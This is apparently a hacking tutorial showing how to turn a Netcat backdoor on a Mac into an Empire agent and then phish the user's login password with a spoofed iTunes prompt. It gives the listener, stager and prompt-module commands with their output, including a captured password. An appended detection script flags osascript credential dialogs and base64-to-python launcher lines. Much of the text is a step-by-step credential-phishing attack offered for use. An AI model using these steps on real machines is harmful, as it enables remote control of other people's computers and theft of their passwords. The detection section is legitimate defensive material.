Finding and abusing files with unsafe permissions is a simple and reliable way to escalate privileges from a shell on a backdoored macOS device. This time we take a more aggressive route: phishing the user's login password by presenting the target with a convincing pop-up that asks for it.
This privilege escalation method consists of the attacker invoking a prompt that instructs the target user to enter their password in a convincing pop-up window. Empire's prompt module lets us spoof which application is requesting the user's login password, so we can make iTunes, the App Store, or any installed app appear to ask for a password in a credible social engineering attack.
As we can see from the whoami command, the established Netcat backdoor is not running as root but as a normal user (tokyoneon).
bash-3.2$ whoami
tokyoneon
The first thing we want to do is turn our primitive Netcat backdoor into a full-featured Empire backdoor. This article assumes that readers have experience with Empire. Beginners should refer to Null Byte's getting-started and stager guides for Empire before proceeding.
Step 1: Start an Empire Listener
Start Empire with a listener waiting for incoming connections from the target MacBook. In this example, I'm using an HTTP listener on port 8080. The following commands can be used to quickly set up an Empire listener:
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Host xx.xx.xx.xx
(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > listeners

[*] Active listeners:

  Name    Module    Host                        Delay/Jitter
  ----    ------    ----                        ------------
  http    http      http://xx.xx.xx.xx:8080     5/0.0

(Empire: listeners) >
The Host value can be the attacker's local network IP address, or a VPS address for remote attacks.
Step 2: Create an OSX Stager
Next, create a launcher script with the osx/launcher stager. This can be done with the following commands:
usestager osx/launcher
set Listener http
generate
The entire launcher output should be copied and pasted into the Netcat terminal, including the "echo" and "python" parts at the beginning and end of the output.
A new agent will appear in the Empire terminal once the launcher has been executed on the MacBook.
(Empire: agents) >
[*] Sending PYTHON stager (stage 1) to xx.xx.xx.xx
[*] Agent P98MAEE0 from xx.xx.xx.xx posted valid Python PUB key
[*] New agent P98MAEE0 checked in
[+] Initial agent P98MAEE0 from xx.xx.xx.xx now active (Slack)
[*] Sending agent (stage 2) to P98MAEE0 at xx.xx.xx.xx
[>] ...................
(Empire: agents) >
Use the command interact to issue commands to the compromised macOS device.
(Empire: stager/osx/launcher) > interact P98MAEE0
(Empire: P98MAEE0) >
Activate the collection/osx/prompt module with the usemodule command. Then use the info command to display the module's available options.
(Empire: P98MAEE0) > usemodule collection/osx/prompt
(Empire: python/collection/osx/prompt) > info

              Name: prompt
            Module: python/collection/osx/prompt
        NeedsAdmin: False
         OpsecSafe: False
          Language: python
MinLanguageVersion: 2.6
        Background: False
   OutputExtension: None

Authors:
  @FuzzyNop
  @harmj0y

Description:
  Launches a specified application with a prompt for credentials with
  osascript.

Comments:
  https://github.com/fuzzynop/FiveOnceInYourLife

Options:

  Name         Required    Value            Description
  ----         --------    -------          -----------
  ListApps     False                        Switch. List applications available to launch.
  SandboxMode  False                        Switch. Launch a sandbox-safe prompt.
  Agent        True        P98MAEE0         Agent to execute module on.
  AppName      True        Google Chrome    The name of the application to launch.

(Empire: python/collection/osx/prompt) >
The ListApps option returns a list of applications installed on the macOS device. Set the value to true and execute the module.
(Empire: python/collection/osx/prompt) > set ListApps true
(Empire: python/collection/osx/prompt) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked P98MAEE0 to run TASK_CMD_WAIT
[*] Agent P98MAEE0 tasked with task ID 1
[*] Tasked agent P98MAEE0 to run module python/collection/osx/prompt
(Empire: python/collection/osx/prompt) >
[*] Agent P98MAEE0 returned results.
Available applications:

    DVD Player
    Siri
    QuickTime Player
    Chess
    Photo Booth
    Notes
    Image Capture
    iBooks
    Google Chrome
    Preview
    Dashboard
    TextEdit
    Mail
    Safari
    Dictionary
    Contacts
    Time Machine
    Utilities
    Font Book
    FaceTime
    Maps
    Mission Control
    Stickies
    Photos
    News
    Calculator
    iTunes
    Firefox
    Launchpad
    Reminders
    App Store
    Automator
    Calendar
    System Preferences
Before selecting an application, unset ListApps so the module does not keep returning the list of applications on every run.
(Empire: python/collection/osx/prompt) > unset ListApps
Many of the applications installed by default are suitable for this attack.
To select an application, set the AppName value to the application's name. In my example, I am using iTunes. Capitalization matters here: note the capital "T" in iTunes. The AppName value must match the name exactly as it appears in the list of apps above.
(Empire: python/collection/osx/prompt) > set AppName iTunes
(Empire: python/collection/osx/prompt) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked P98MAEE0 to run TASK_CMD_WAIT
[*] Agent P98MAEE0 tasked with task ID 2
[*] Tasked agent P98MAEE0 to run module python/collection/osx/prompt
After a few seconds, the target user is presented with a password prompt that appears to come from the application of your choice.
After the user submits the password, the Empire terminal displays the following results:
(Empire: python/collection/osx/prompt) >
[*] Agent P98MAEE0 returned results.
button returned:OK, text returned:super-secret-password-54321
If the target user is busy browsing iTunes media or deeply engaged in work, they are unlikely to hesitate before entering their password just to dismiss the annoying prompt.
Backdoor Attack Defense
Defending against such attacks is difficult. Antivirus software can usually be bypassed with a few simple tricks, so it is not a very reliable defense. If you receive unexpected password prompts, or your MacBook's fans spin up for no apparent reason, it may indicate that your macOS device has been compromised. In my next article, I'll cover a few strategies for identifying backdoors on your macOS devices … so stay tuned.
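The two observable traces this attack leaves on the endpoint are the ones the article itself describes: a stager that is pasted into a shell as an "echo ... | ... python" line, and a credential dialog raised through osascript by a scripted process rather than by the application whose name it shows. The following is an added detection example, not code from the article or from the Empire project. It runs a pair of heuristic rules over constructed process-execution records (pid, parent process name, process name, command line); the record format, the keyword list and the set of "scripted" parent processes are assumptions for illustration, and real telemetry would come from an EDR or process-audit feed.

```python
import re

# Constructed sample process-execution records (not real telemetry).
# Each record: (pid, parent process name, process name, command line).
SAMPLE_RECORDS = [
    # A Python-driven agent raising a password dialog dressed up as iTunes.
    (501, "python", "osascript",
     "osascript -e 'display dialog \"iTunes requires your password\" "
     "default answer \"\" with hidden answer'"),
    # The pasted launcher: echo <base64 blob> piped through a decoder into python.
    (502, "bash", "bash",
     "bash -c \"echo 'aW1wb3J0IHN5czsgaW1wb3J0IGJhc2U2NDsgZXhlYygnJyk=' "
     "| base64 --decode | python\""),
    # Benign: a user's own script showing a notification from Script Editor.
    (503, "Script Editor", "osascript",
     "osascript -e 'display notification \"Backup finished\"'"),
    # Benign: an ordinary interactive python invocation.
    (504, "Terminal", "python", "python -m http.server 8000"),
]

# Heuristic (assumed keywords): an osascript dialog that hides the typed text,
# or whose text mentions a password, is collecting a credential.
CREDENTIAL_DIALOG = re.compile(r"display dialog.*?(hidden answer|password)", re.I | re.S)

# "echo <long base64 blob> | ... python": the decode-and-execute launcher shape,
# matching the "echo" and "python" at both ends of the stager output above.
B64_LAUNCHER = re.compile(r"echo\s+['\"]?[A-Za-z0-9+/=]{32,}['\"]?\s*\|.*\bpython\b", re.S)

# Parents that mean the prompt was scripted, not raised by a user in an app (assumed set).
SCRIPTED_PARENTS = {"python", "python2", "python3", "bash", "sh", "zsh", "perl"}


def analyze(records):
    """Return one alert dict per suspicious record, in input order."""
    alerts = []
    for pid, parent, proc, cmdline in records:
        if proc == "osascript" and CREDENTIAL_DIALOG.search(cmdline):
            # A credential dialog spawned by an interpreter or shell is the strongest signal.
            severity = "high" if parent.lower() in SCRIPTED_PARENTS else "medium"
            alerts.append({
                "pid": pid,
                "rule": "osascript_credential_prompt",
                "severity": severity,
                "detail": f"{parent} -> {proc} raised a credential dialog",
            })
        if B64_LAUNCHER.search(cmdline):
            alerts.append({
                "pid": pid,
                "rule": "base64_python_launcher",
                "severity": "high",
                "detail": f"{proc} decoded an inline base64 blob into python",
            })
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_RECORDS):
        print(f"[{alert['severity']}] pid={alert['pid']} {alert['rule']}: {alert['detail']}")
```

Run against the constructed records, only pids 501 and 502 are flagged; the notification dialog and the plain interactive python invocation pass. The parent-process check is the useful part: a genuine iTunes or App Store password request is never rendered by osascript under a Python or shell parent, so that pairing is worth an alert on its own even before the dialog text is inspected.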